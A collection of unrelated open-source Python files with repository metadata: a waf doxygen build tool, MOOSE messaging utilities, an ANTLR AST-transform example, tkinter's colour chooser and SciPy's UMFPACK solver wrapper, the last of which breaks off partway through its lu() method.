rpmcpp/Audacity | lib-src/lv2/serd/waflib/extras/doxygen.py | 14 | 4734 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
from fnmatch import fnmatchcase
import os,os.path,re,stat
from waflib import Task,Utils,Node,Logs
from waflib.TaskGen import feature
DOXY_STR='${DOXYGEN} - '
DOXY_FMTS='html latex man rft xml'.split()
DOXY_FILE_PATTERNS='*.'+' *.'.join('''
c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx hpp h++ idl odl cs php php3
inc m mm py f90c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx
'''.split())
re_rl=re.compile('\\\\\r*\n',re.MULTILINE)
re_nl=re.compile('\r*\n',re.M)
def parse_doxy(txt):
tbl={}
txt=re_rl.sub('',txt)
lines=re_nl.split(txt)
for x in lines:
x=x.strip()
if not x or x.startswith('#')or x.find('=')<0:
continue
if x.find('+=')>=0:
tmp=x.split('+=')
key=tmp[0].strip()
if key in tbl:
tbl[key]+=' '+'+='.join(tmp[1:]).strip()
else:
tbl[key]='+='.join(tmp[1:]).strip()
else:
tmp=x.split('=')
tbl[tmp[0].strip()]='='.join(tmp[1:]).strip()
return tbl
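# Rough illustration of parse_doxy() (doxyfile snippet invented):
#   parse_doxy("# comment\nPROJECT_NAME = Serd\nINPUT = src\\\n include\n")
#   -> {'PROJECT_NAME': 'Serd', 'INPUT': 'src include'}
# Comments, blank lines and lines without '=' are skipped, continuation
# backslashes are folded away, and 'KEY += value' appends to an existing KEY.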
class doxygen(Task.Task):
vars=['DOXYGEN','DOXYFLAGS']
color='BLUE'
def runnable_status(self):
'''
self.pars are populated in runnable_status - because this function is being
run *before* both self.pars "consumers" - scan() and run()
set output_dir (node) for the output
'''
for x in self.run_after:
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self,'pars',None):
txt=self.inputs[0].read()
self.pars=parse_doxy(txt)
if not self.pars.get('OUTPUT_DIRECTORY'):
self.pars['OUTPUT_DIRECTORY']=self.inputs[0].parent.get_bld().abspath()
self.doxy_inputs=getattr(self,'doxy_inputs',[])
if not self.pars.get('INPUT'):
self.doxy_inputs.append(self.inputs[0].parent)
else:
for i in self.pars.get('INPUT').split():
if os.path.isabs(i):
node=self.generator.bld.root.find_node(i)
else:
node=self.generator.path.find_node(i)
if not node:
self.generator.bld.fatal('Could not find the doxygen input %r'%i)
self.doxy_inputs.append(node)
if not getattr(self,'output_dir',None):
bld=self.generator.bld
self.output_dir=bld.root.find_dir(self.pars['OUTPUT_DIRECTORY'])
if not self.output_dir:
self.output_dir=bld.path.find_or_declare(self.pars['OUTPUT_DIRECTORY'])
self.signature()
return Task.Task.runnable_status(self)
def scan(self):
if self.pars.get('RECURSIVE')=='YES':
Logs.warn("Doxygen RECURSIVE dependencies are not supported")
exclude_patterns=self.pars.get('EXCLUDE_PATTERNS','').split()
file_patterns=self.pars.get('FILE_PATTERNS','').split()
if not file_patterns:
file_patterns=DOXY_FILE_PATTERNS
nodes=[]
names=[]
for node in self.doxy_inputs:
if os.path.isdir(node.abspath()):
for m in node.ant_glob(file_patterns):
nodes.append(m)
else:
nodes.append(node)
return(nodes,names)
def run(self):
code='\n'.join(['%s = %s'%(x,self.pars[x])for x in self.pars])
code=code
cmd=Utils.subst_vars(DOXY_STR,self.env)
env=self.env.env or None
proc=Utils.subprocess.Popen(cmd,shell=True,stdin=Utils.subprocess.PIPE,env=env,cwd=self.generator.bld.path.get_bld().abspath())
proc.communicate(code)
return proc.returncode
def post_run(self):
nodes=self.output_dir.ant_glob('**/*',quiet=True)
for x in nodes:
x.sig=Utils.h_file(x.abspath())
self.outputs+=nodes
return Task.Task.post_run(self)
class tar(Task.Task):
run_str='${TAR} ${TAROPTS} ${TGT} ${SRC}'
color='RED'
after=['doxygen']
def runnable_status(self):
for x in getattr(self,'input_tasks',[]):
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self,'tar_done_adding',None):
self.tar_done_adding=True
for x in getattr(self,'input_tasks',[]):
self.set_inputs(x.outputs)
if not self.inputs:
return Task.SKIP_ME
return Task.Task.runnable_status(self)
def __str__(self):
tgt_str=' '.join([a.nice_path(self.env)for a in self.outputs])
return'%s: %s\n'%(self.__class__.__name__,tgt_str)
@feature('doxygen')
def process_doxy(self):
if not getattr(self,'doxyfile',None):
self.generator.bld.fatal('no doxyfile??')
node=self.doxyfile
if not isinstance(node,Node.Node):
node=self.path.find_resource(node)
if not node:
raise ValueError('doxygen file not found')
dsk=self.create_task('doxygen',node)
if getattr(self,'doxy_tar',None):
tsk=self.create_task('tar')
tsk.input_tasks=[dsk]
tsk.set_outputs(self.path.find_or_declare(self.doxy_tar))
if self.doxy_tar.endswith('bz2'):
tsk.env['TAROPTS']=['cjf']
elif self.doxy_tar.endswith('gz'):
tsk.env['TAROPTS']=['czf']
else:
tsk.env['TAROPTS']=['cf']
def configure(conf):
conf.find_program('doxygen',var='DOXYGEN')
conf.find_program('tar',var='TAR')
| gpl-2.0 | -1,094,926,839,967,606,800 | 32.104895 | 129 | 0.667934 | false |
yipenggao/moose | python/mooseutils/message.py | 4 | 3962 | import os
import traceback
from mooseutils import colorText
try:
from PyQt5 import QtWidgets, QtCore
MOOSE_USE_QT5 = True
except:
MOOSE_USE_QT5 = False
"""
Global for enabling/disabling debug mode.
"""
MOOSE_DEBUG_MODE = os.environ.get("MOOSE_PYTHON_DEBUG_MODE") == "1"
"""
Global for enabling/disabling testing mode.
"""
MOOSE_TESTING_MODE = False
if MOOSE_USE_QT5:
class MessageEmitter(QtCore.QObject):
message = QtCore.pyqtSignal(str, str)
def write(self, msg, color):
if not self.signalsBlocked():
self.message.emit(str(msg), str(color))
messageEmitter = MessageEmitter()
def mooseMessage(*args, **kwargs):
"""
A generic message function.
Args:
args[tuple]: Comma separated items to be printed, non strings are converted with 'repr'.
Kwargs:
        error[bool]: (Default: False) When True and 'dialog=True' the "Critical" icon is included with the message.
        warning[bool]: (Default: False) When True and 'dialog=True' the "Warning" icon is included with the message.
traceback[bool]: (Default: False) When True the stack trace is printed with the message.
dialog[bool]: (Default: False) When true a QDialog object is created, the error will still print to the console as well.
color[str]: (Default: None) Add the bash color string to the message (see colorText).
debug[bool]: (Default: False) Print the message only if tools.MOOSE_DEBUG_MODE = True.
test[bool]: FOR TESTING ONLY! (Default: False) When True the QDialog is not executed, just returned.
indent[int]: Number of levels to indent (2 spaces are applied to each level)
"""
# Grab the options
error = kwargs.pop('error', False)
warning = kwargs.pop('warning', False)
trace = kwargs.pop('traceback', False)
dialog = kwargs.pop('dialog', False)
color = kwargs.pop('color', None)
test = kwargs.pop('test', False)
indent = kwargs.pop('indent', 0)
# Build the message
message = []
for arg in args:
if not isinstance(arg, str):
message.append(repr(arg))
else:
message.append(arg)
message = '{}{}'.format(' '*2*indent, ' '.join(message))
# Show a dialog box
if MOOSE_USE_QT5 and dialog and not MOOSE_TESTING_MODE:
box = QtWidgets.QMessageBox()
box.setText(message)
if warning:
box.setIcon(QtWidgets.QMessageBox.Warning)
elif error:
box.setIcon(QtWidgets.QMessageBox.Critical)
if test:
return box
box.exec_()
# Emit the message to any listeners
if MOOSE_USE_QT5:
messageEmitter.write(message, color)
# Print the message to screen
if color:
message = colorText(message, color)
print message
# Show the traceback
if trace and MOOSE_USE_QT5:
traceback.print_stack()
stack = ''.join(traceback.format_stack())
messageEmitter.write(stack, color)
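# Hedged usage sketch for mooseMessage and the wrappers defined below
# (messages are arbitrary examples, not part of the original module):
#   mooseMessage("Loaded", 42, "meshes", color='GREEN')
#   mooseError("Missing [Mesh] block in input file")    # red text + traceback
#   mooseWarning("Falling back to serial execution")
#   mooseDebug("Raw options:", {'n': 4}, debug=True)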
def mooseError(*args, **kwargs):
"""
A mooseMessage setup to produce an error.
"""
return mooseMessage('ERROR\n', *args, error = kwargs.pop('error', True),
color = kwargs.pop('color', 'RED'),
traceback = kwargs.pop('traceback', True),
**kwargs)
def mooseWarning(*args, **kwargs):
"""
A mooseMessage setup to produce a warning.
"""
return mooseMessage('WARNING\n', *args, warning = kwargs.pop('warning', True),
color = kwargs.pop('color', 'YELLOW'), **kwargs)
def mooseDebug(*args, **kwargs):
"""
A mooseMessage that only appears with the global MOOSE_DEBUG_MODE = True or debug=True passed directly.
"""
if kwargs.pop('debug', MOOSE_DEBUG_MODE):
return mooseMessage(*args, color=kwargs.pop('color', 'CYAN'), **kwargs)
| lgpl-2.1 | 270,579,507,329,784,160 | 32.576271 | 128 | 0.617113 | false |
wbardzinski/boo | lib/antlr-2.7.5/examples/python/transform/transform.py | 21 | 1906 | import sys
import antlr
class Visitor(antlr.ASTVisitor):
def __init__(self,*args):
super(Visitor,self).__init__(*args)
self.level = 0
if not args:
self.cout = sys.stdout
return
if isinstance(args[0],file):
self.cout = args[0]
return
assert 0
def tabs(self):
print " " * self.level
def printf(self,fmt,*args):
if not args:
sys.stdout.write(fmt)
return
argv = tuple(args)
self.cout.write(fmt % argv)
def flush(self):
self.cout.flush()
def visit1(self,node):
if not node:
self.printf(" nil ")
return
c = node.getType()
t = node.getText()
k = node.getFirstChild()
s = node.getNextSibling()
self.printf("( <%s> ",c)
if t:
self.printf(" %s ",t)
self.visit1(k);
self.visit1(s);
self.printf(")")
def visit(self,node):
self.visit1(node);
self.printf("\n")
def main():
import transform_l
import transform_p
import transform_w
L = transform_l.Lexer()
P = transform_p.Parser(L)
P.setFilename(L.getFilename())
### Parse the input expression
try:
P.expr()
except antlr.ANTLRException, ex:
print "*** error(s) while parsing."
print ">>> exit(1)"
import sys
sys.exit(1)
ast = P.getAST()
if not ast:
print "stop - no AST generated."
import sys
sys.exit(1)
###show tree
print "Tree: " + ast.toStringTree()
print "List: " + ast.toStringList()
print "Node: " + ast.toString()
print "visit>>"
visitor = Visitor()
visitor.visit(ast);
print "visit<<"
W = transform_w.Walker();
### Traverse the tree created by the parser
W.expr(ast);
ast = W.getAST();
print "List: " + ast.toStringList()
if __name__ == "__main__":
main()
| bsd-3-clause | 2,495,115,237,138,690,000 | 19.276596 | 46 | 0.5383 | false |
Krossom/python-for-android | python3-alpha/python3-src/Lib/tkinter/colorchooser.py | 128 | 1793 | # tk common colour chooser dialogue
#
# this module provides an interface to the native color dialogue
# available in Tk 4.2 and newer.
#
# written by Fredrik Lundh, May 1997
#
# fixed initialcolor handling in August 1998
#
#
# options (all have default values):
#
# - initialcolor: colour to mark as selected when dialog is displayed
# (given as an RGB triplet or a Tk color string)
#
# - parent: which window to place the dialog on top of
#
# - title: dialog title
#
from tkinter.commondialog import Dialog
#
# color chooser class
class Chooser(Dialog):
"Ask for a color"
command = "tk_chooseColor"
def _fixoptions(self):
try:
# make sure initialcolor is a tk color string
color = self.options["initialcolor"]
if isinstance(color, tuple):
# assume an RGB triplet
self.options["initialcolor"] = "#%02x%02x%02x" % color
except KeyError:
pass
def _fixresult(self, widget, result):
        # result can be several things: an empty tuple, an empty string or
        # a Tcl_Obj, so this somewhat weird check handles all of them
if not result or not str(result):
return None, None # canceled
# to simplify application code, the color chooser returns
# an RGB tuple together with the Tk color string
r, g, b = widget.winfo_rgb(result)
return (r/256, g/256, b/256), str(result)
#
# convenience stuff
def askcolor(color = None, **options):
"Ask for a color"
if color:
options = options.copy()
options["initialcolor"] = color
return Chooser(**options).show()
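# Hedged example of the options documented above (values are arbitrary):
#   askcolor()                      # -> ((r, g, b), '#rrggbb') or (None, None)
#   askcolor((255, 0, 0), title="Pick a highlight colour")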
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
print("color", askcolor())
| apache-2.0 | 4,391,824,875,301,953,000 | 23.902778 | 70 | 0.607362 | false |
huard/scipy-work | scipy/sparse/linalg/dsolve/umfpack/umfpack.py | 2 | 23373 | """
Interface to the UMFPACK library.
--
Author: Robert Cimrman
"""
#from base import Struct, pause
import numpy as np
import scipy.sparse as sp
import re
try: # Silence import error.
import _umfpack as _um
except:
_um = None
assumeSortedIndices = False
##
# 10.01.2006, c
def configure( **kwargs ):
"""
    Valid keyword arguments with defaults (others are ignored):
      assumeSortedIndices = False
    Umfpack requires a CSR/CSC matrix to have sorted column/row indices. If
    you are sure that the matrix fulfills this, pass assumeSortedIndices =
True to gain some speed.
"""
if 'assumeSortedIndices' in kwargs:
globals()['assumeSortedIndices'] = kwargs['assumeSortedIndices']
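# Example (sketch): after sorting indices on a SciPy CSR/CSC matrix, e.g. via
# mtx.sort_indices(), the per-call check can be skipped for speed:
#   configure(assumeSortedIndices=True)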
##
# 30.11.2005, c
def updateDictWithVars( adict, module, pattern, group = None ):
match = re.compile( pattern ).match
for name in [ii for ii in vars( module ).keys()
if match( ii )]:
if group is not None:
outName = match( name ).group( group )
else:
outName = name
adict[outName] = module.__dict__[name]
return adict
##
# How to list these automagically?
umfControls = [
'UMFPACK_PRL',
'UMFPACK_DENSE_ROW',
'UMFPACK_DENSE_COL',
'UMFPACK_BLOCK_SIZE',
'UMFPACK_STRATEGY',
'UMFPACK_2BY2_TOLERANCE',
'UMFPACK_FIXQ',
'UMFPACK_AMD_DENSE',
'UMFPACK_AGGRESSIVE',
'UMFPACK_PIVOT_TOLERANCE',
'UMFPACK_ALLOC_INIT',
'UMFPACK_SYM_PIVOT_TOLERANCE',
'UMFPACK_SCALE',
'UMFPACK_FRONT_ALLOC_INIT',
'UMFPACK_DROPTOL',
'UMFPACK_IRSTEP',
'UMFPACK_COMPILED_WITH_BLAS',
'UMFPACK_COMPILED_FOR_MATLAB',
'UMFPACK_COMPILED_WITH_GETRUSAGE',
'UMFPACK_COMPILED_IN_DEBUG_MODE',
'UMFPACK_STRATEGY_AUTO',
'UMFPACK_STRATEGY_UNSYMMETRIC',
'UMFPACK_STRATEGY_2BY2',
'UMFPACK_STRATEGY_SYMMETRIC',
'UMFPACK_SCALE_NONE',
'UMFPACK_SCALE_SUM',
'UMFPACK_SCALE_MAX',
]
umfInfo = [
'UMFPACK_STATUS',
'UMFPACK_NROW',
'UMFPACK_NCOL',
'UMFPACK_NZ',
'UMFPACK_SIZE_OF_UNIT',
'UMFPACK_SIZE_OF_INT',
'UMFPACK_SIZE_OF_LONG',
'UMFPACK_SIZE_OF_POINTER',
'UMFPACK_SIZE_OF_ENTRY',
'UMFPACK_NDENSE_ROW',
'UMFPACK_NEMPTY_ROW',
'UMFPACK_NDENSE_COL',
'UMFPACK_NEMPTY_COL',
'UMFPACK_SYMBOLIC_DEFRAG',
'UMFPACK_SYMBOLIC_PEAK_MEMORY',
'UMFPACK_SYMBOLIC_SIZE',
'UMFPACK_SYMBOLIC_TIME',
'UMFPACK_SYMBOLIC_WALLTIME',
'UMFPACK_STRATEGY_USED',
'UMFPACK_ORDERING_USED',
'UMFPACK_QFIXED',
'UMFPACK_DIAG_PREFERRED',
'UMFPACK_PATTERN_SYMMETRY',
'UMFPACK_NZ_A_PLUS_AT',
'UMFPACK_NZDIAG',
'UMFPACK_SYMMETRIC_LUNZ',
'UMFPACK_SYMMETRIC_FLOPS',
'UMFPACK_SYMMETRIC_NDENSE',
'UMFPACK_SYMMETRIC_DMAX',
'UMFPACK_2BY2_NWEAK',
'UMFPACK_2BY2_UNMATCHED',
'UMFPACK_2BY2_PATTERN_SYMMETRY',
'UMFPACK_2BY2_NZ_PA_PLUS_PAT',
'UMFPACK_2BY2_NZDIAG',
'UMFPACK_COL_SINGLETONS',
'UMFPACK_ROW_SINGLETONS',
'UMFPACK_N2',
'UMFPACK_S_SYMMETRIC',
'UMFPACK_NUMERIC_SIZE_ESTIMATE',
'UMFPACK_PEAK_MEMORY_ESTIMATE',
'UMFPACK_FLOPS_ESTIMATE',
'UMFPACK_LNZ_ESTIMATE',
'UMFPACK_UNZ_ESTIMATE',
'UMFPACK_VARIABLE_INIT_ESTIMATE',
'UMFPACK_VARIABLE_PEAK_ESTIMATE',
'UMFPACK_VARIABLE_FINAL_ESTIMATE',
'UMFPACK_MAX_FRONT_SIZE_ESTIMATE',
'UMFPACK_MAX_FRONT_NROWS_ESTIMATE',
'UMFPACK_MAX_FRONT_NCOLS_ESTIMATE',
'UMFPACK_NUMERIC_SIZE',
'UMFPACK_PEAK_MEMORY',
'UMFPACK_FLOPS',
'UMFPACK_LNZ',
'UMFPACK_UNZ',
'UMFPACK_VARIABLE_INIT',
'UMFPACK_VARIABLE_PEAK',
'UMFPACK_VARIABLE_FINAL',
'UMFPACK_MAX_FRONT_SIZE',
'UMFPACK_MAX_FRONT_NROWS',
'UMFPACK_MAX_FRONT_NCOLS',
'UMFPACK_NUMERIC_DEFRAG',
'UMFPACK_NUMERIC_REALLOC',
'UMFPACK_NUMERIC_COSTLY_REALLOC',
'UMFPACK_COMPRESSED_PATTERN',
'UMFPACK_LU_ENTRIES',
'UMFPACK_NUMERIC_TIME',
'UMFPACK_UDIAG_NZ',
'UMFPACK_RCOND',
'UMFPACK_WAS_SCALED',
'UMFPACK_RSMIN',
'UMFPACK_RSMAX',
'UMFPACK_UMIN',
'UMFPACK_UMAX',
'UMFPACK_ALLOC_INIT_USED',
'UMFPACK_FORCED_UPDATES',
'UMFPACK_NUMERIC_WALLTIME',
'UMFPACK_NOFF_DIAG',
'UMFPACK_ALL_LNZ',
'UMFPACK_ALL_UNZ',
'UMFPACK_NZDROPPED',
'UMFPACK_IR_TAKEN',
'UMFPACK_IR_ATTEMPTED',
'UMFPACK_OMEGA1',
'UMFPACK_OMEGA2',
'UMFPACK_SOLVE_FLOPS',
'UMFPACK_SOLVE_TIME',
'UMFPACK_SOLVE_WALLTIME',
'UMFPACK_ORDERING_COLAMD',
'UMFPACK_ORDERING_AMD',
'UMFPACK_ORDERING_GIVEN',
]
if _um:
##
# Export UMFPACK constants from _um.
umfDefines = updateDictWithVars( {}, _um, 'UMFPACK_.*' )
locals().update( umfDefines )
umfStatus = {
UMFPACK_OK : 'UMFPACK_OK',
UMFPACK_WARNING_singular_matrix : 'UMFPACK_WARNING_singular_matrix',
UMFPACK_WARNING_determinant_underflow : 'UMFPACK_WARNING_determinant_underflow',
UMFPACK_WARNING_determinant_overflow : 'UMFPACK_WARNING_determinant_overflow',
UMFPACK_ERROR_out_of_memory : 'UMFPACK_ERROR_out_of_memory',
UMFPACK_ERROR_invalid_Numeric_object : 'UMFPACK_ERROR_invalid_Numeric_object',
UMFPACK_ERROR_invalid_Symbolic_object : 'UMFPACK_ERROR_invalid_Symbolic_object',
UMFPACK_ERROR_argument_missing : 'UMFPACK_ERROR_argument_missing',
UMFPACK_ERROR_n_nonpositive : 'UMFPACK_ERROR_n_nonpositive',
UMFPACK_ERROR_invalid_matrix : 'UMFPACK_ERROR_invalid_matrix',
UMFPACK_ERROR_different_pattern : 'UMFPACK_ERROR_different_pattern',
UMFPACK_ERROR_invalid_system : 'UMFPACK_ERROR_invalid_system',
UMFPACK_ERROR_invalid_permutation : 'UMFPACK_ERROR_invalid_permutation',
UMFPACK_ERROR_internal_error : 'UMFPACK_ERROR_internal_error',
UMFPACK_ERROR_file_IO : 'UMFPACK_ERROR_file_IO',
}
umfSys = [
UMFPACK_A,
UMFPACK_At,
UMFPACK_Aat,
UMFPACK_Pt_L,
UMFPACK_L,
UMFPACK_Lt_P,
UMFPACK_Lat_P,
UMFPACK_Lt,
UMFPACK_U_Qt,
UMFPACK_U,
UMFPACK_Q_Ut,
UMFPACK_Q_Uat,
UMFPACK_Ut,
UMFPACK_Uat,
]
# Real, complex.
umfSys_transposeMap = [
{UMFPACK_A : UMFPACK_At,
UMFPACK_At : UMFPACK_A,
UMFPACK_Aat : UMFPACK_A},
{UMFPACK_A : UMFPACK_Aat,
UMFPACK_Aat : UMFPACK_A}
]
umfFamilyTypes = {'di' : int, 'dl' : long, 'zi' : int, 'zl' : long}
umfRealTypes = ('di', 'dl')
umfComplexTypes = ('zi', 'zl')
##
# 02.01.2005
class Struct( object ):
# 03.10.2005, c
# 26.10.2005
def __init__( self, **kwargs ):
if kwargs:
self.__dict__.update( kwargs )
# 08.03.2005
def __str__( self ):
ss = "%s\n" % self.__class__
for key, val in self.__dict__.iteritems():
if (issubclass( self.__dict__[key].__class__, Struct )):
ss += " %s:\n %s\n" % (key, self.__dict__[key].__class__)
else:
aux = "\n" + str( val )
aux = aux.replace( "\n", "\n " );
ss += " %s:\n%s\n" % (key, aux[1:])
return( ss.rstrip() )
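##
# Illustrative sketch, not part of the original module: Struct is a plain
# attribute bag built from keyword arguments; the attribute names below are
# examples only.
def _example_struct_usage():
    opts = Struct( tol = 1e-8, verbose = True )
    return opts.tol, opts.verbose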
##
# 30.11.2005, c
class UmfpackContext( Struct ):
##
# 30.11.2005, c
# 01.12.2005
# 21.12.2005
# 01.03.2006
def __init__( self, family = 'di', **kwargs ):
"""
Arguments:
family .. family of UMFPACK functions ('di', 'dl', 'zi', 'zl')
Keyword arguments:
        maxCond .. if the estimated condition number is greater than maxCond,
                   a warning is printed (default: 1e12)"""
if _um is None:
raise ImportError('Scipy was built without UMFPACK support. '
'You need to install the UMFPACK library and '
'header files before building scipy.')
self.maxCond = 1e12
Struct.__init__( self, **kwargs )
if family not in umfFamilyTypes.keys():
raise TypeError, 'wrong family: %s' % family
self.family = family
self.control = np.zeros( (UMFPACK_CONTROL, ), dtype = np.double )
self.info = np.zeros( (UMFPACK_INFO, ), dtype = np.double )
self._symbolic = None
self._numeric = None
self.mtx = None
self.isReal = self.family in umfRealTypes
##
# Functions corresponding to <family> are stored in self.funs.
pattern = 'umfpack_' + family + '_(.*)'
fn = updateDictWithVars( {}, _um, pattern, group = 1 )
self.funs = Struct( **fn )
self.funs.defaults( self.control )
self.control[UMFPACK_PRL] = 3
##
# 30.11.2005, c
def strControl( self ):
maxLen = max( [len( name ) for name in umfControls] )
format = '%%-%ds : %%d' % maxLen
aux = [format % (name, self.control[umfDefines[name]])
for name in umfControls if name in umfDefines]
return '\n'.join( aux )
##
# 01.12.2005, c
def strInfo( self ):
maxLen = max( [len( name ) for name in umfInfo] )
format = '%%-%ds : %%d' % maxLen
aux = [format % (name, self.info[umfDefines[name]])
for name in umfInfo if name in umfDefines]
return '\n'.join( aux )
##
# 30.11.2005, c
# 01.12.2005
# 14.12.2005
# 01.03.2006
def _getIndx( self, mtx ):
if sp.isspmatrix_csc( mtx ):
indx = mtx.indices
self.isCSR = 0
elif sp.isspmatrix_csr( mtx ):
indx = mtx.indices
self.isCSR = 1
else:
raise TypeError, 'must be a CSC/CSR matrix (is %s)' % mtx.__class__
##
# Should check types of indices to correspond to familyTypes.
if self.family[1] == 'i':
if (indx.dtype != np.dtype('i')) \
or mtx.indptr.dtype != np.dtype('i'):
raise ValueError, 'matrix must have int indices'
else:
if (indx.dtype != np.dtype('l')) \
or mtx.indptr.dtype != np.dtype('l'):
raise ValueError, 'matrix must have long indices'
if self.isReal:
if mtx.data.dtype != np.dtype('<f8'):
raise ValueError, 'matrix must have float64 values'
else:
if mtx.data.dtype != np.dtype('<c16'):
raise ValueError, 'matrix must have complex128 values'
return indx
##
# 30.11.2005, c
# last revision: 10.01.2007
def symbolic( self, mtx ):
"""Symbolic object (symbolic LU decomposition) computation for a given
sparsity pattern."""
self.free_symbolic()
indx = self._getIndx( mtx )
if not assumeSortedIndices:
# row/column indices cannot be assumed to be sorted
mtx.sort_indices()
if self.isReal:
status, self._symbolic\
= self.funs.symbolic( mtx.shape[0], mtx.shape[1],
mtx.indptr, indx, mtx.data,
self.control, self.info )
else:
real, imag = mtx.data.real.copy(), mtx.data.imag.copy()
status, self._symbolic\
= self.funs.symbolic( mtx.shape[0], mtx.shape[1],
mtx.indptr, indx,
real, imag,
self.control, self.info )
## print status, self._symbolic
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s' % (self.funs.symbolic,
umfStatus[status])
self.mtx = mtx
##
# 30.11.2005, c
# 01.12.2005
# 02.12.2005
# 01.03.2006
def numeric( self, mtx ):
"""Numeric object (LU decomposition) computation using the
symbolic decomposition. The symbolic decomposition is (re)computed
if necessary."""
self.free_numeric()
if self._symbolic is None:
self.symbolic( mtx )
indx = self._getIndx( mtx )
failCount = 0
while 1:
if self.isReal:
status, self._numeric\
= self.funs.numeric( mtx.indptr, indx, mtx.data,
self._symbolic,
self.control, self.info )
else:
real, imag = mtx.data.real.copy(), mtx.data.imag.copy()
status, self._numeric\
= self.funs.numeric( mtx.indptr, indx,
real, imag,
self._symbolic,
self.control, self.info )
## print status, self._numeric
if status != UMFPACK_OK:
if status == UMFPACK_WARNING_singular_matrix:
print 'warning: singular matrix'
break
elif status in (UMFPACK_ERROR_different_pattern,
UMFPACK_ERROR_invalid_Symbolic_object):
# Try again.
print 'warning: recomputing symbolic'
self.symbolic( mtx )
failCount += 1
else:
failCount += 100
else:
break
if failCount >= 2:
raise RuntimeError, '%s failed with %s' % (self.funs.numeric,
umfStatus[status])
##
# 14.12.2005, c
def report_symbolic( self ):
"""Print information about the symbolic object. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_symbolic( self._symbolic, self.control )
##
# 14.12.2005, c
def report_numeric( self ):
"""Print information about the numeric object. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_numeric( self._numeric, self.control )
##
# 14.12.2005, c
def report_control( self ):
"""Print control values."""
self.funs.report_control( self.control )
##
# 14.12.2005, c
def report_info( self ):
"""Print all status information. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_info( self.control, self.info )
##
# 30.11.2005, c
# 01.12.2005
def free_symbolic( self ):
if self._symbolic is not None:
self.funs.free_symbolic( self._symbolic )
self._symbolic = None
self.mtx = None
##
# 30.11.2005, c
# 01.12.2005
def free_numeric( self ):
if self._numeric is not None:
self.funs.free_numeric( self._numeric )
self._numeric = None
self.free_symbolic()
##
# 30.11.2005, c
def free( self ):
self.free_symbolic()
self.free_numeric()
##
# 30.11.2005, c
# 01.12.2005
# 02.12.2005
# 21.12.2005
# 01.03.2006
def solve( self, sys, mtx, rhs, autoTranspose = False ):
"""
Solution of system of linear equation using the Numeric object.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
if sys not in umfSys:
            raise ValueError, 'sys must be in %s' % umfSys
if autoTranspose and self.isCSR:
##
# UMFPACK uses CSC internally...
if self.family in umfRealTypes: ii = 0
else: ii = 1
if sys in umfSys_transposeMap[ii]:
sys = umfSys_transposeMap[ii][sys]
else:
raise RuntimeError, 'autoTranspose ambiguous, switch it off'
if self._numeric is not None:
if self.mtx is not mtx:
raise ValueError, 'must be called with same matrix as numeric()'
else:
raise RuntimeError, 'numeric() not called'
indx = self._getIndx( mtx )
if self.isReal:
rhs = rhs.astype( np.float64 )
sol = np.zeros( (mtx.shape[1],), dtype = np.float64 )
status = self.funs.solve( sys, mtx.indptr, indx, mtx.data, sol, rhs,
self._numeric, self.control, self.info )
else:
rhs = rhs.astype( np.complex128 )
sol = np.zeros( (mtx.shape[1],), dtype = np.complex128 )
mreal, mimag = mtx.data.real.copy(), mtx.data.imag.copy()
sreal, simag = sol.real.copy(), sol.imag.copy()
rreal, rimag = rhs.real.copy(), rhs.imag.copy()
status = self.funs.solve( sys, mtx.indptr, indx,
mreal, mimag, sreal, simag, rreal, rimag,
self._numeric, self.control, self.info )
sol.real, sol.imag = sreal, simag
#self.funs.report_info( self.control, self.info )
#pause()
if status != UMFPACK_OK:
if status == UMFPACK_WARNING_singular_matrix:
## Change inf, nan to zeros.
print 'zeroing nan and inf entries...'
sol[~np.isfinite( sol )] = 0.0
else:
raise RuntimeError, '%s failed with %s' % (self.funs.solve,
umfStatus[status])
econd = 1.0 / self.info[UMFPACK_RCOND]
if econd > self.maxCond:
print 'warning: (almost) singular matrix! '\
+ '(estimated cond. number: %.2e)' % econd
return sol
##
# 30.11.2005, c
# 01.12.2005
def linsolve( self, sys, mtx, rhs, autoTranspose = False ):
"""
One-shot solution of system of linear equation. Reuses Numeric object
if possible.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
# print self.family
if sys not in umfSys:
            raise ValueError, 'sys must be in %s' % umfSys
if self._numeric is None:
self.numeric( mtx )
else:
if self.mtx is not mtx:
self.numeric( mtx )
sol = self.solve( sys, mtx, rhs, autoTranspose )
self.free_numeric()
return sol
##
# 30.11.2005, c
# 01.12.2005
def __call__( self, sys, mtx, rhs, autoTranspose = False ):
"""
Uses solve() or linsolve() depending on the presence of the Numeric
object.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
if self._numeric is not None:
return self.solve( sys, mtx, rhs, autoTranspose )
else:
return self.linsolve( sys, mtx, rhs, autoTranspose )
##
# 21.09.2006, added by Nathan Bell
def lu( self, mtx ):
"""
Returns an LU decomposition of an m-by-n matrix in the form
(L, U, P, Q, R, do_recip):
L - Lower triangular m-by-min(m,n) CSR matrix
U - Upper triangular min(m,n)-by-n CSC matrix
P - Vector of row permuations
Q - Vector of column permuations
R - Vector of diagonal row scalings
do_recip - boolean
For a given matrix A, the decomposition satisfies:
LU = PRAQ when do_recip is true
LU = P(R^-1)AQ when do_recip is false
"""
#this should probably be changed
mtx = mtx.tocsc()
self.numeric( mtx )
#first find out how much space to reserve
